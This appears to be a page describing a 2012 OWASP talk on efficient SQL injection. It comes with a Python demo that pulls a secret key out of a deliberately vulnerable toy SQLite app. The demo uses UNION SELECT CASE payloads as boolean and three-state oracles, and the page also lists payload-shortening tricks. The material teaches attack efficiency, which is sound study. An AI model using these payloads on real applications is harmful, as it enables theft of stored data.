Harder, Better, Faster, Stronger... presented at OWASP AppSecAsiaPac 2012

by Luke Jahnke

Tags: Security

Summary: SQL injection vulnerabilities are common and relatively well-known; however, most current discussion of SQL injection attacks focuses on WAF bypass or on gaining more access to the system (e.g. code execution). This talk focuses instead on how to be more efficient in retrieving the information stored within the database.
This talk contains three major components. Firstly: how to reduce the size of SQL injection payloads, for example replacing "OR 1=1" with "||1" in MySQL (where "||" is logical OR by default and only becomes string concatenation when sql_mode includes PIPES_AS_CONCAT), as well as how some functions can help reduce exploit size.
Secondly: How to retrieve more information with only a single request, for example, how to utilise information encoding, compression functions and previous knowledge (such as data-type and format) to retrieve more data.
Finally: How to retrieve more information using more states; blind SQL injection exploitation is based on boolean states, but in some situations, more states can be created.
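As an added illustration of the second and third points above (this is example code written for this page, not material from the talk), the following Python script simulates blind extraction against a hypothetical application backed by an in-memory SQLite database. The table, the secret value `f00dcafe`, the vulnerable lookup and its three page outcomes are all constructed for the example; the talk's own payloads were MySQL-specific, whereas the SQL here is written for SQLite. The application branches into one of three pages (admin dashboard, user home, not found) depending on a looked-up role, so an attacker who knows that behaviour can turn each request into a three-way answer rather than a yes/no, and prior knowledge that the secret is hex shrinks the candidate set from the start.

```python
import sqlite3
import string

# Constructed toy backend standing in for the target application's database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, role TEXT, api_key TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [("alice", "admin", "f00dcafe"), ("bob", "user", "deadbeef")])


def vulnerable_app(username: str) -> str:
    """Hypothetical sink: the username is concatenated into SQL (the bug) and
    the app renders one of three pages based on the looked-up role. The
    queried data itself is never echoed back, so injection here is blind."""
    sql = f"SELECT role FROM users WHERE username = '{username}'"
    row = conn.execute(sql).fetchone()
    role = row[0] if row else None
    if role == "admin":
        return "admin_dashboard"
    if role == "user":
        return "user_home"
    return "not_found"


# Subquery yielding the code point of character `pos` (1-indexed) of alice's key.
TARGET = "(SELECT unicode(substr(api_key,{pos},1)) FROM users WHERE username='alice')"


def two_state_query(pos: int, threshold: int) -> bool:
    """Classic boolean oracle: is char[pos] < threshold? One bit per request."""
    c = TARGET.format(pos=pos)
    payload = f"' UNION SELECT CASE WHEN {c} < {threshold} THEN 'admin' END--"
    return vulnerable_app(payload) == "admin_dashboard"


def three_state_query(pos: int, lo: int, hi: int) -> int:
    """Three-state oracle built from the app's three pages: returns 0 if
    char[pos] < lo, 2 if char[pos] > hi, 1 otherwise (log2(3) bits/request)."""
    c = TARGET.format(pos=pos)
    payload = (f"' UNION SELECT CASE WHEN {c} < {lo} THEN 'admin' "
               f"WHEN {c} > {hi} THEN 'user' END--")
    return {"admin_dashboard": 0, "user_home": 2}.get(vulnerable_app(payload), 1)


def extract(length: int, alphabet: str, states: int):
    """Recover `length` characters by narrowing a candidate set per position.
    `alphabet` encodes prior knowledge of the data format (e.g. hex digits);
    `states` selects a binary (2) or ternary (3) search over the candidates.
    Returns (recovered_value, number_of_requests)."""
    base = sorted(ord(ch) for ch in alphabet)
    recovered, requests = [], 0
    for pos in range(1, length + 1):
        cands = list(base)
        while len(cands) > 1:
            n = len(cands)
            requests += 1
            if states == 2:
                mid = n // 2
                cands = cands[:mid] if two_state_query(pos, cands[mid]) else cands[mid:]
            else:
                a, b = (n + 2) // 3, (2 * n + 2) // 3   # three near-equal slices
                part = three_state_query(pos, cands[a], cands[b - 1])
                cands = (cands[:a], cands[a:b], cands[b:])[part]
        recovered.append(chr(cands[0]))
    return "".join(recovered), requests


if __name__ == "__main__":
    hexchars = string.digits + "abcdef"
    for states in (2, 3):
        print(f"{states} states, hex alphabet:", extract(8, hexchars, states))
    print("2 states, alphanumeric alphabet:",
          extract(8, string.ascii_letters + string.digits, 2))
```

With the hex alphabet the boolean search needs exactly four requests per character (32 in total for the eight-character key), while the three-state search recovers the same key in 21 requests; dropping the format knowledge and searching the 62 alphanumerics instead costs the boolean search at least five requests per character. In a real engagement the third state might come from an error page, a different HTTP status or a content difference rather than a role-based branch; the search logic is the same once the oracle function returns three distinguishable values.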